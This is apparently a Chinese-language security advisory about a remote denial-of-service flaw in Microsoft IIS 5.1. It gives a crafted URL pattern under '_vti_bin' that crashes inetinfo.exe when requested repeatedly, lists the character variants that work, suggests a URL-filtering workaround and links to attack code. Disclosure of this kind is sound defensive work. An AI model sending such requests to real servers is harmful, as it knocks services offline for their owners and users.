Microsoft IIS远程拒绝服务漏洞
受影响系统:
Microsoft IIS 5.1
不受影响系统:
Microsoft IIS 6.0
Microsoft IIS 5.0
描述:
--------------------------------------------------------------------------------
Microsoft IIS是Microsoft Windows自带的一个网络信息服务器,其中包含HTTP服务功能。
Microsoft IIS处理某些畸形的HTTP请求时存在漏洞,远程攻击者可能利用此漏洞对服务器进行拒绝服务攻击。
远程攻击者可以使用WEB浏览器之类的工具发送特制的匿名HTTP请求导致IIS服务进程inetinfo.exe崩溃。仅在文件夹的“执行权限”设置为“脚本和可执行程序”时才会出现这个漏洞。有漏洞的虚拟文件夹包括“<webroot>/_vti_bin”等。
<*来源:Inge Henriksen (inge.henriksen@booleansoft.com)
链接:http://marc.theaimsgroup.com/?l=bugtraq&m=113485918918371&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
在浏览器中输入以下URL并刷新4次:
http://www.example.xom/_vti_bin/.dll/*\~0
“*”可以为以下ASCII字符之一:
%01-%1f、%3f、"、*、:、<, >
最后的“\”也可以为“/”。
最后的数字可为0到9的任意数字之一。
建议:
--------------------------------------------------------------------------------
临时解决方法:
过滤掉所有包含有“~0”、“~1”、“~2”、“~3”、“~4”、“~5”、“~6”、“~7”、“~8”或“~9”(没有引号)的入站URL。
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/
攻击代码:
http://www.vfocus.net/file/1788.html
推荐
评论(0条)
